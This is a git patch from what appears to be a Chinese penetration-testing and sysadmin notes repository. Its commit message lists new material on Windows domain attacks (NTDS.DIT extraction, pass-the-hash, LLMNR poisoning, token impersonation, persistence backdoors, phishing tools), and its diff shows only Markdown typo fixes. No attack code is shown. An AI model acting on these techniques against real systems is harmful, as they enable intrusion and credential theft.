From 4470dc7a94a4ef20c546a7e619582c7e78d07112 Mon Sep 17 00:00:00 2001
From: No-Github
Date: Fri, 5 Jun 2020 17:23:35 +0800
Subject: [PATCH] =?UTF-8?q?=E6=97=A5=E6=9C=9F=205.19~6.5?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
- 统一修改所有目录格式语法,由 切换为
- 统一移动所有笔记 banner 图至 img/banner 文件夹
安全
Power-PenTest
++ 添加钓鱼攻击中常见的定位、随机身份信息、短信骚扰资源工具
++ 添加关于 Azure 云 AD 的文章
Crypto
++ 修改了目录和排序结构
~ 添加对 web-tools 笔记的链接
CTF
++ 添加压缩包取证
++ 添加 2020 网鼎杯朱雀组、玄武组的 writeup
RedTeam
1. 安防设备总结
++ 补充上海格尔安全认证网关管理系统的漏洞记录
2. 后渗透
++ 添加 Windows 远程执行命令的相关手段
3. 逻辑类漏洞
++ 添加一个 Ticket_Trick 类漏洞的案例
4. 权限提升
++ 添加域中通过 Windows Access Token 令牌假冒提权的方法
++ 添加 MS14-025 漏洞资源
++ 补充 MS14-068 漏洞资源
5. 权限维持
++ 添加中间件后门 pwnginx
++ 添加 windows 中的LGP 后门
++ 添加 windows 域中相关的维权手段
6. 协议安全
++ 补充一下 smb 的信息收集方法
7. 信息收集
++ 添加动态爬虫的相关资源
++ 添加几个 massan 的扫描语句用于扫描对应服务
++ 添加收集域信息的手段和相关工具
~ 添加对 web-tools 笔记的链接
8. Windows 渗透
++ 添加几种获取 NTDS.DIT 的手段
++ 补充 PTH、PTT 相关内容
++ 添加毒化LLMNR和NBT-NS请求的攻击手段
BlueTeam
1. 监察
++ 添加威胁情报里 IP 分析的相关资源
2. 应急
++ 添加几篇介绍黑帽 SEO 的文章
工具
1. Hashcat
++ 补充爆破 NTLM-hash、爆破 net-NTLMv2 的示例
2. Kali
++ 补充 rdesktop 的示例,用于 linux 进行 RDP 连接
3. Nmap
++ 参考 https://github.com/al0ne/Nmap_Bypass_IDS 补充一些规避的知识点
4. mimikatz
++ 添加 NTDS.DIT、PTT、PTK 的利用案例
5. Wireshark
++ 补充 NTLMv2 的抓包过程,补充域环境中 NTLM 认证的抓包过程
运维
Linux
1. Power-Linux
~ 修改了几处错误,比如文件版本打错了这种问题
2. Speed-Linux
++ 补充 linux 几个发行版配置网络的命令
++ 补充 apt 的几种使用
++ 添加切换系统显示语言的方法
Windows
1. Secure-Win
++ 补充本地管理员密码解决方案(LAPS)
++ 添加令牌假冒防御
2. Speed-Win
~ 参考自己 Speed-Linux 的整体结构,整出来的 windows 版,没什么好说的
笔记
1. 工作组
++ 添加基本内容
2. 角色权限
++ 添加 Windows Access Token 相关内容
3. 认证
++ 整体重构,删除了一些重复的描述语句,添加了2种描述 kerberos 的方式
4. 信息
++ 参考 linux 的信息笔记,整出来的 windows 版,没什么好说的
5. 组策略
++ 添加基本内容
6. 域
++ 添加基本内容
实验
1. Windows 域搭建
++ 添加基本内容
Plan
1. Team-Plan
++ 知识库-Wiki 添加 Confluence,推荐使用,就是需要挂代理
2. VM-Plan
++ 添加安装vmware-tools出现 what is the location of the “ifconfig”program on your machine? 的解决方法
3. Web-Tools
++ 半年一次的更新
---
1earn/Plan/Markdown.md | 8 +-
1earn/Plan/Misc-Plan.md | 8 +-
1earn/Plan/Team-Plan.md | 3 +-
1earn/Plan/VM-Plan.md | 12 +-
1earn/Plan/Web-Tools.md | 665 +++++++-----
.../Power-PenTest.md" | 50 +-
.../MISC/HID-Digispark.md" | 2 +-
.../Misc/DVWA-WalkThrough.md" | 4 +-
.../Misc/pikachu-WalkThrough.md" | 2 +-
.../Misc/upload-labs-WalkThrough.md" | 2 +-
.../\345\267\245\345\205\267/BurpSuite.md" | 2 +-
.../\345\267\245\345\205\267/CobaltStrike.md" | 17 +-
.../\345\267\245\345\205\267/Hashcat.md" | 17 +-
.../\345\267\245\345\205\267/Kali.md" | 13 +-
.../\345\267\245\345\205\267/Metasploit.md" | 48 +-
.../\345\267\245\345\205\267/Nmap.md" | 92 +-
.../\345\267\245\345\205\267/SET.md" | 2 +-
.../\345\267\245\345\205\267/Sqlmap.md" | 2 +-
.../\345\267\245\345\205\267/Sysmon.md" | 2 +-
.../\345\267\245\345\205\267/Wfuzz.md" | 2 +-
.../\345\267\245\345\205\267/Wireshark.md" | 52 +-
.../\345\267\245\345\205\267/aircrack.md" | 2 +-
.../\345\267\245\345\205\267/mimikatz.md" | 149 ++-
.../BlueTeam/\345\272\224\346\200\245.md" | 17 +-
.../BlueTeam/\347\233\221\345\257\237.md" | 51 +-
.../\347\254\224\350\256\260/CTF.md" | 45 +-
.../\347\254\224\350\256\260/Crypto.md" | 437 ++++----
.../RedTeam/Linux\346\270\227\351\200\217.md" | 2 +
...70\350\247\201\346\274\217\346\264\236.md" | 26 +
.../Windows\346\270\227\351\200\217.md" | 668 +++++++++---
.../\347\254\224\350\256\260/RedTeam/XSS.md" | 2 +-
...41\346\201\257\346\224\266\351\233\206.md" | 432 +++++---
...17\350\256\256\345\256\211\345\205\250.md" | 8 +
.../\345\220\216\346\270\227\351\200\217.md" | 112 +-
...76\345\244\207\346\200\273\347\273\223.md" | 3 +
...264\242\345\274\225\346\223\216Hacking.md" | 26 +-
...03\351\231\220\346\217\220\345\215\207.md" | 52 +
...03\351\231\220\347\273\264\346\214\201.md" | 218 +++-
...15\345\212\241\345\256\211\345\205\250.md" | 8 -
...21\347\261\273\346\274\217\346\264\236.md" | 1 +
...46\344\271\240\347\254\224\350\256\260.md" | 2 +-
.../Linux/God-Linux.md" | 2 +-
.../Linux/Power-Linux.md" | 29 +-
.../Linux/Secure-Linux.md" | 2 +-
.../Linux/Speed-Linux.md" | 305 +++---
.../\344\277\241\346\201\257.md" | 11 +-
.../Windows/CMD\345\221\275\344\273\244.md" | 407 --------
.../PowerShell\347\254\224\350\256\260.md" | 10 +-
.../Windows/Secure-Win.md" | 52 +-
.../Windows/Speed-Win.md" | 963 ++++++++++++++++++
...ws\345\237\237\346\220\255\345\273\272.md" | 253 +++++
...15\345\212\241\346\220\255\345\273\272.md" | 34 +-
.../\344\277\241\346\201\257.md" | 200 ++++
.../\347\254\224\350\256\260/\345\237\237.md" | 269 +++++
.../\345\267\245\344\275\234\347\273\204.md" | 34 +
.../\346\227\245\345\277\227.md" | 4 +-
.../\347\273\204\347\255\226\347\225\245.md" | 112 ++
...22\350\211\262\346\235\203\351\231\220.md" | 46 +-
.../\350\256\244\350\257\201.md" | 504 +++++++--
README.md | 365 +++----
assets/img/Misc/Misc-Plan.jpg | Bin 144835 -> 0 bytes
assets/img/Misc/VM-Plan.jpg | Bin 221367 -> 0 bytes
assets/img/Misc/Web-Tools.jpg | Bin 42678 -> 0 bytes
assets/img/banner/God-Linux.jpg | Bin 0 -> 72741 bytes
.../img/banner/HID-Digispark.jpg | Bin
assets/img/banner/Misc-Plan.jpg | Bin 0 -> 155882 bytes
assets/img/banner/Power-Linux.jpg | Bin 0 -> 87169 bytes
.../{pentest.jpg => banner/Power-PenTest.jpg} | Bin
assets/img/banner/Secure-Linux.jpg | Bin 0 -> 82264 bytes
assets/img/banner/Secure-Win.jpg | Bin 0 -> 108730 bytes
assets/img/banner/Speed-Linux.jpg | Bin 0 -> 95217 bytes
assets/img/{Misc => banner}/Team-Plan.jpg | Bin
assets/img/banner/VM-Plan.jpg | Bin 0 -> 180607 bytes
assets/img/banner/Web-Tools.jpg | Bin 0 -> 117228 bytes
assets/img/banner/Windows.jpg | Bin 0 -> 83050 bytes
assets/img/{ => banner}/logo.png | Bin
assets/img/banner/png.jpg | Bin 0 -> 20889 bytes
assets/img/{ => banner}/readme.jpg | Bin
.../windows\346\227\245\345\277\227.png" | Bin
"assets/img/banner/\345\237\237.png" | Bin 0 -> 28233 bytes
...64\242\345\274\225\346\223\216Hacking.jpg" | Bin 0 -> 105846 bytes
.../Wireshark/10.png" | Bin 0 -> 966 bytes
.../Wireshark/11.png" | Bin 0 -> 30844 bytes
.../Wireshark/12.png" | Bin 0 -> 31693 bytes
.../Wireshark/13.png" | Bin 0 -> 29149 bytes
.../Wireshark/14.png" | Bin 0 -> 1063 bytes
.../Wireshark/15.png" | Bin 0 -> 47000 bytes
.../Wireshark/NTLMv2.pcapng" | Bin 0 -> 3800 bytes
.../\345\237\237\345\206\205NTLM.pcapng" | Bin 0 -> 9168 bytes
.../\345\267\245\345\205\267/mimikatz/1.png" | Bin 0 -> 4046 bytes
.../\345\267\245\345\205\267/mimikatz/2.png" | Bin 0 -> 2707 bytes
.../\345\267\245\345\205\267/mimikatz/3.png" | Bin 0 -> 3759 bytes
.../\345\267\245\345\205\267/mimikatz/4.png" | Bin 0 -> 2654 bytes
.../Windows\346\270\227\351\200\217/2.png" | Bin 0 -> 23530 bytes
.../1.jpg" | Bin 162812 -> 0 bytes
.../2.png" | Bin 0 -> 22442 bytes
.../3.png" | Bin 0 -> 17154 bytes
.../4.png" | Bin 0 -> 2516 bytes
.../Linux/God-Linux.jpg" | Bin 84542 -> 0 bytes
.../Linux/Power-Linux.jpg" | Bin 87855 -> 0 bytes
.../Linux/Secure-Linux.jpg" | Bin 68981 -> 0 bytes
.../Linux/Speed-Linux.jpg" | Bin 231621 -> 0 bytes
.../Windows/Secure-Win.jpg" | Bin 84370 -> 0 bytes
.../\345\237\237/1.png" | Bin 0 -> 6525 bytes
.../\345\237\237/10.png" | Bin 0 -> 4605 bytes
.../\345\237\237/11.png" | Bin 0 -> 3692 bytes
.../\345\237\237/12.png" | Bin 0 -> 18682 bytes
.../\345\237\237/13.png" | Bin 0 -> 11438 bytes
.../\345\237\237/14.png" | Bin 0 -> 15720 bytes
.../\345\237\237/15.png" | Bin 0 -> 21185 bytes
.../\345\237\237/16.png" | Bin 0 -> 9574 bytes
.../\345\237\237/17.png" | Bin 0 -> 17851 bytes
.../\345\237\237/18.png" | Bin 0 -> 11894 bytes
.../\345\237\237/19.png" | Bin 0 -> 15557 bytes
.../\345\237\237/2.png" | Bin 0 -> 5937 bytes
.../\345\237\237/20.png" | Bin 0 -> 13853 bytes
.../\345\237\237/21.png" | Bin 0 -> 9783 bytes
.../\345\237\237/22.png" | Bin 0 -> 20243 bytes
.../\345\237\237/23.png" | Bin 0 -> 4345 bytes
.../\345\237\237/24.png" | Bin 0 -> 2239 bytes
.../\345\237\237/25.png" | Bin 0 -> 45643 bytes
.../\345\237\237/26.png" | Bin 0 -> 32815 bytes
.../\345\237\237/27.png" | Bin 0 -> 30198 bytes
.../\345\237\237/28.png" | Bin 0 -> 1077 bytes
.../\345\237\237/29.png" | Bin 0 -> 19324 bytes
.../\345\237\237/3.png" | Bin 0 -> 6561 bytes
.../\345\237\237/30.png" | Bin 0 -> 3985 bytes
.../\345\237\237/31.png" | Bin 0 -> 4235 bytes
.../\345\237\237/32.png" | Bin 0 -> 12354 bytes
.../\345\237\237/33.png" | Bin 0 -> 3223 bytes
.../\345\237\237/34.png" | Bin 0 -> 3359 bytes
.../\345\237\237/35.png" | Bin 0 -> 7460 bytes
.../\345\237\237/4.png" | Bin 0 -> 5175 bytes
.../\345\237\237/5.png" | Bin 0 -> 8147 bytes
.../\345\237\237/6.png" | Bin 0 -> 10840 bytes
.../\345\237\237/7.png" | Bin 0 -> 6886 bytes
.../\345\237\237/8.png" | Bin 0 -> 6293 bytes
.../\345\237\237/9.png" | Bin 0 -> 9750 bytes
.../\345\237\237/1.drawio" | 1 +
.../\345\237\237/1.png" | Bin 0 -> 11973 bytes
.../\345\237\237/2.drawio" | 1 +
.../\345\237\237/2.png" | Bin 0 -> 6982 bytes
.../\345\237\237/3.drawio" | 1 +
.../\345\237\237/3.png" | Bin 0 -> 10091 bytes
.../\345\237\237/4.drawio" | 1 +
.../\345\237\237/4.png" | Bin 0 -> 5294 bytes
.../\345\237\237/5.drawio" | 1 +
.../\345\237\237/5.png" | Bin 0 -> 14676 bytes
.../1.png" | Bin 0 -> 8770 bytes
.../1.png" | Bin 0 -> 8189 bytes
.../2.png" | Bin 0 -> 8647 bytes
.../3.png" | Bin 0 -> 10842 bytes
.../4.png" | Bin 0 -> 17572 bytes
.../\350\256\244\350\257\201/10.drawio" | 1 +
.../\350\256\244\350\257\201/10.png" | Bin 43798 -> 28499 bytes
.../\350\256\244\350\257\201/13.drawio" | 1 +
.../\350\256\244\350\257\201/13.png" | Bin 80901 -> 23665 bytes
.../\350\256\244\350\257\201/20.drawio" | 1 +
.../\350\256\244\350\257\201/20.png" | Bin 0 -> 12186 bytes
.../\350\256\244\350\257\201/21.drawio" | 1 +
.../\350\256\244\350\257\201/21.png" | Bin 0 -> 17514 bytes
.../\350\256\244\350\257\201/22.drawio" | 1 +
.../\350\256\244\350\257\201/22.png" | Bin 0 -> 8179 bytes
.../\350\256\244\350\257\201/23.drawio" | 1 +
.../\350\256\244\350\257\201/23.png" | Bin 0 -> 8926 bytes
.../\350\256\244\350\257\201/24.drawio" | 1 +
.../\350\256\244\350\257\201/24.png" | Bin 0 -> 4974 bytes
.../\350\256\244\350\257\201/25.drawio" | 1 +
.../\350\256\244\350\257\201/25.png" | Bin 0 -> 14104 bytes
.../\350\256\244\350\257\201/26.png" | Bin 0 -> 15514 bytes
.../\350\256\244\350\257\201/27.png" | Bin 0 -> 6844 bytes
.../\350\256\244\350\257\201/28.png" | Bin 0 -> 17008 bytes
.../\350\256\244\350\257\201/29.png" | Bin 0 -> 10778 bytes
.../\350\256\244\350\257\201/30.png" | Bin 0 -> 20460 bytes
.../\350\256\244\350\257\201/31.png" | Bin 0 -> 20255 bytes
.../\350\256\244\350\257\201/32.png" | Bin 0 -> 9147 bytes
.../\350\256\244\350\257\201/33.png" | Bin 0 -> 11666 bytes
.../\350\256\244\350\257\201/34.png" | Bin 0 -> 2381 bytes
.../\350\256\244\350\257\201/35.png" | Bin 0 -> 4180 bytes
.../\350\256\244\350\257\201/36.png" | Bin 0 -> 20492 bytes
.../\350\256\244\350\257\201/37.png" | Bin 0 -> 30210 bytes
.../\350\256\244\350\257\201/7.drawio" | 1 +
.../\350\256\244\350\257\201/7.png" | Bin 60230 -> 40226 bytes
.../Windows\350\256\244\350\257\201.png" | Bin 0 -> 8620 bytes
.../windows\350\256\244\350\257\201.xmind" | Bin 0 -> 33806 bytes
185 files changed, 5077 insertions(+), 1805 deletions(-)
delete mode 100644 "1earn/\350\277\220\347\273\264/Windows/CMD\345\221\275\344\273\244.md"
create mode 100644 "1earn/\350\277\220\347\273\264/Windows/Speed-Win.md"
create mode 100644 "1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\345\237\237\346\220\255\345\273\272.md"
rename "1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\346\234\215\345\212\241\346\220\255\345\273\272.md" => "1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\345\237\272\347\241\200\346\234\215\345\212\241\346\220\255\345\273\272.md" (94%)
create mode 100644 "1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\344\277\241\346\201\257.md"
create mode 100644 "1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237.md"
create mode 100644 "1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\267\245\344\275\234\347\273\204.md"
create mode 100644 "1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\347\273\204\347\255\226\347\225\245.md"
delete mode 100644 assets/img/Misc/Misc-Plan.jpg
delete mode 100644 assets/img/Misc/VM-Plan.jpg
delete mode 100644 assets/img/Misc/Web-Tools.jpg
create mode 100644 assets/img/banner/God-Linux.jpg
rename "assets/img/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/HID-Digispark/1.jpg" => assets/img/banner/HID-Digispark.jpg (100%)
create mode 100644 assets/img/banner/Misc-Plan.jpg
create mode 100644 assets/img/banner/Power-Linux.jpg
rename assets/img/{pentest.jpg => banner/Power-PenTest.jpg} (100%)
create mode 100644 assets/img/banner/Secure-Linux.jpg
create mode 100644 assets/img/banner/Secure-Win.jpg
create mode 100644 assets/img/banner/Speed-Linux.jpg
rename assets/img/{Misc => banner}/Team-Plan.jpg (100%)
create mode 100644 assets/img/banner/VM-Plan.jpg
create mode 100644 assets/img/banner/Web-Tools.jpg
create mode 100644 assets/img/banner/Windows.jpg
rename assets/img/{ => banner}/logo.png (100%)
create mode 100644 assets/img/banner/png.jpg
rename assets/img/{ => banner}/readme.jpg (100%)
rename "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\346\227\245\345\277\227/1.png" => "assets/img/banner/windows\346\227\245\345\277\227.png" (100%)
create mode 100644 "assets/img/banner/\345\237\237.png"
create mode 100644 "assets/img/banner/\346\220\234\347\264\242\345\274\225\346\223\216Hacking.jpg"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark/10.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark/11.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark/12.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark/13.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark/14.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark/15.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark/NTLMv2.pcapng"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark/\345\237\237\345\206\205NTLM.pcapng"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/mimikatz/1.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/mimikatz/2.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/mimikatz/3.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\345\267\245\345\205\267/mimikatz/4.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/Windows\346\270\227\351\200\217/2.png"
delete mode 100644 "assets/img/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\220\234\347\264\242\345\274\225\346\223\216Hacking/1.jpg"
create mode 100644 "assets/img/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\235\203\351\231\220\347\273\264\346\214\201/2.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\235\203\351\231\220\347\273\264\346\214\201/3.png"
create mode 100644 "assets/img/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\235\203\351\231\220\347\273\264\346\214\201/4.png"
delete mode 100644 "assets/img/\350\277\220\347\273\264/Linux/God-Linux.jpg"
delete mode 100644 "assets/img/\350\277\220\347\273\264/Linux/Power-Linux.jpg"
delete mode 100644 "assets/img/\350\277\220\347\273\264/Linux/Secure-Linux.jpg"
delete mode 100644 "assets/img/\350\277\220\347\273\264/Linux/Speed-Linux.jpg"
delete mode 100644 "assets/img/\350\277\220\347\273\264/Windows/Secure-Win.jpg"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/1.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/10.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/11.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/12.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/13.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/14.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/15.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/16.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/17.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/18.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/19.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/2.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/20.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/21.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/22.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/23.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/24.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/25.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/26.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/27.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/28.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/29.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/3.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/30.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/31.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/32.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/33.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/34.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/35.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/4.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/5.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/6.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/7.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/8.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/\345\237\237/9.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237/1.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237/1.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237/2.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237/2.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237/3.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237/3.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237/4.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237/4.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237/5.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237/5.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\267\245\344\275\234\347\273\204/1.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\347\273\204\347\255\226\347\225\245/1.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\347\273\204\347\255\226\347\225\245/2.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\347\273\204\347\255\226\347\225\245/3.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\347\273\204\347\255\226\347\225\245/4.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/10.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/13.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/20.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/20.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/21.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/21.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/22.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/22.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/23.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/23.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/24.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/24.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/25.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/25.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/26.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/27.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/28.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/29.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/30.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/31.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/32.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/33.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/34.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/35.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/36.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/37.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/7.drawio"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/Windows\350\256\244\350\257\201.png"
create mode 100644 "assets/img/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201/windows\350\256\244\350\257\201.xmind"
diff --git a/1earn/Plan/Markdown.md b/1earn/Plan/Markdown.md
index 846ccb40..7eb36a16 100644
--- a/1earn/Plan/Markdown.md
+++ b/1earn/Plan/Markdown.md
@@ -149,11 +149,11 @@ This is an H2
The HTML specification is maintained by the W3C.
-### 引用 Blockquotes
+### 引用 Blockquote
-> 引用文本 Blockquotes
+> 引用文本 Blockquote
-引用的行内混合 Blockquotes
+引用的行内混合 Blockquote
> 引用:如果想要插入空白换行`即
标签`,在插入处先键入两个以上的空格然后回车即可,[普通链接](http://localhost/).
@@ -470,7 +470,7 @@ Andrew->>China: I am good thanks!
# 转html方案
- https://marketplace.visualstudio.com/items?itemName=shd101wyy.markdown-preview-enhanced
- - 从浏览器打开,cstl+s
+ - 从浏览器打开,ctrl+s
---
diff --git a/1earn/Plan/Misc-Plan.md b/1earn/Plan/Misc-Plan.md
index 4953a726..57252085 100644
--- a/1earn/Plan/Misc-Plan.md
+++ b/1earn/Plan/Misc-Plan.md
@@ -1,14 +1,14 @@
# Misc-Plan
-
+
---
# 激活
-注意:Windows 系统和 Micrsoft Office 软件都必须是 VOL 版本.
+> 注意 : Windows 系统和 Microsoft Office 软件都必须是 VOL 版本.
**激活 Windows**
@@ -267,9 +267,9 @@ ffmpeg -f concat -i filelist.txt -c copy output.mkv
**视频压缩**
